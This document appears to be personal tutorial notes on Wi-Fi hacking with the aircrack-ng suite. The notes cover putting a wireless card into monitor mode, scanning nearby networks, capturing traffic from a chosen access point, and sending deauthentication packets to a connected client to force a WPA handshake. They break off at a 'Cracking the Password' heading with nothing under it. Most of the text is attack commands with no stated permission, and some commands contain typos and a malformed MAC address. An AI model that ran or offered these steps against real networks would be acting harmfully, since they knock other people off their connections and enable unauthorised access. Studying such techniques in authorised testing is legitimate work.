Check if our Wi-Fi Card is connected to our host

iwconfig

Checking for any process that are running and will kill those processes that could interfere with what we are about to do

airmon-ng check kill

Placing our card into Monitor Mode

airmon-ng start wlan0

<aside> 💡 Monitor Mode allows our wireless card to perform monitoring of all the incoming traffic and that's going to allow us to eavesdrop, listen in and hopefully gather that handshake.

</aside>

To find the wireless networks

airodump-ng wlan0mon

BSSID: Mac Address of the Access Point PWR: Power Level - Lower the negative number, more close we are to that device Beacons, #Data, #/s : Shows us how much traffic is there or how much data is being transfered CH: Channel - Wireless (1-14), Big Channels are 1,6,11 as they don't have any overlaps but it varies with 2.4 Ghz and 5 Ghz ESSIDNe5uU: Name of all the networks. Our card can also find the hidden networks.

To capture the information from a specific device and store into a file

airodump-ng -c 6 --bssid 50:C7:BF:8A:00:73 -w capture wla0mon

-c: Channel -w: To save the output into a file

We can't get any handshake. Let's try to deauth a device

aireplay-ng -0 1 -a 50:C7:BF:8A:00:73 -c 3C:F0:11:22:dDB:E3 wlan0mon

-0: Zero - Means to deauth 1: To run only one time -a: MAC address of AP -c: Station -The client we are attacking ( Select a device which is connected to target network.)

Sometimes we can't capture handshake even after deauthing a device. The we need to try different user or wait for the right person, try deauthing someone who is close to you.

We ran our scan a lot of time to capture the hash. Let's see all our capture files

ls capture*

Cracking the Password